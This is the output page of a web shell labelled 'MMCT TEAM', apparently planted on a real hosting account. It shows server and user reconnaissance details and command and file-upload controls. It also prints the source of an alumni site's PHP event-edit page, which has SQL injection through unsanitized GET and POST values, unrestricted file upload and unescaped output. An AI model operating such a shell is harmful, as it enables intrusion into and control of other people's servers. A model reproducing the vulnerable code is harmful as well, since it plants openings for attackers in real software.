MMCT TEAM
Server IP : 2a02:4780:3:1493:0:3736:a38e:7  /  Your IP : 216.73.216.60
Web Server : LiteSpeed
System : Linux sg-nme-web1393.main-hosting.eu 4.18.0-553.77.1.lve.el8.x86_64 #1 SMP Wed Oct 8 14:21:00 UTC 2025 x86_64
User : u926327694 ( 926327694)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u926327694/domains/smsoft.in/public_html/demo/../alumini/adminweb/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u926327694/domains/smsoft.in/public_html/demo/../alumini/adminweb/event-edit.php
<?php  
$id=0;
if(isset($_GET['id']))
{
	$page_title = 'Edit Event';
	include 'header.php';
	$id = $_GET['id'];
	$sel=mysqli_query($con,"select * from events where id=$id");
	while($row_event=mysqli_fetch_array($sel))
	{
		?>
		<div class="content-wrapper">
			<section class="content mt-4">
				<div class="container-fluid">
					<div class="row">
						<div class="col-md-12">
							<?php include('alert-msg.php'); ?>
							<div class="card card-primary">
								<div class="card-header">
									<h3 class="card-title"><?php echo $page_title; ?></h3>
								</div>
								<form action="" method="POST" enctype="multipart/form-data">
									<div class="card-body">
										<div class="row">
											<div class="col-md-8">
												<div class="row">
													<div class="col-md-6">
														<div class="form-group">
															<label>Event Name</label>
															<input type="text" class="form-control" name="event_name" value="<?php echo $row_event['event_name']; ?>" required />
														</div>
													</div>
													<div class="col-md-6">
														<div class="form-group">
															<label>Date</label>
															<input type="text" class="form-control" name="event_date" value="<?php echo Date('Y-m-d',strtotime($row_event['event_date'])); ?>" required />
														</div>
													</div>
												</div>
												<div class="row">
													<div class="col-md-12">
														<div class="form-group">
															<label>Description</label>
															<textarea class="text_editor" name="event_description">
																<?php echo $row_event['event_description']; ?>
															</textarea>
														</div>
													</div>
												</div>
												<div class="row">
													<div class="col-md-12">
														<div class="form-group">
															<label for="exampleInputFile">Photos</label>
															<div class="input-group">
																<div class="custom-file">
																	<input type="file" class="custom-file-input fileUpload_allow" name="event_photo" id="exampleInputFile">
																	<label class="custom-file-label" for="exampleInputFile">Choose file</label>
																</div>
															</div>
														</div>
													</div>
												</div>
											</div>
											<div class="col-md-4">
												<div class="form-group">
													<label for="exampleInputFile">Event Photos</label>
													<img src="<?php echo $row_event['event_photo']; ?>" style="width:100%;" />
												</div>
											</div>
										</div>
										<button type="submit" class="btn btn-primary" name="btnSubmit">Submit</button>
									</div>
								</form>
							</div>
						</div>
					</div>
				</div>
			</section>
		</div>
		<?php
	}
	?>
	<?php include 'footer.php'; ?>
	<?php
}
else
{
	session_start();
	$_SESSION['error_msg'] = 'Something wrong...';
	echo"<script>window.location='event-list.php';</script>";
}
?>


<?php
if(isset($_POST['btnSubmit']))
{
	$event_name = $_POST['event_name'];
	$event_date = $_POST['event_date'];
	$event_description = $_POST['event_description'];

	if($_FILES["event_photo"]["name"]!="")
	{
		$fileinfo=PATHINFO($_FILES["event_photo"]["name"]);
		$newFilename="event_". time()."." .$fileinfo['extension'];

		$location="uploads/events/" . $newFilename;
		$upd = mysqli_query($con,"UPDATE `events`  SET event_name='$event_name', event_date='$event_date',  event_description='$event_description', event_photo='$location' WHERE id=$id");

		if($upd)
		{
			move_uploaded_file($_FILES["event_photo"]["tmp_name"],$location);
			$_SESSION['success_msg'] = 'Event has been updated...';
			echo"<script>window.location='event-list.php';</script>";
		}
		else
		{
			$_SESSION['error_msg'] = 'Unable to update Event...';
			echo"<script>window.location='event-list.php';</script>";
		}
	}
	else
	{
		$upd = mysqli_query($con,"UPDATE `events`  SET event_name='$event_name', event_date='$event_date',  event_description='$event_description' WHERE id=$id");
		if($upd)
		{
			$_SESSION['success_msg'] = 'Event has been updated...';
			echo"<script>window.location='event-list.php';</script>";
		}
		else
		{
			$_SESSION['error_msg'] = 'Unable to update Event...';
			echo"<script>window.location='event-list.php';</script>";
		}
	}
}
?>

MMCT - 2023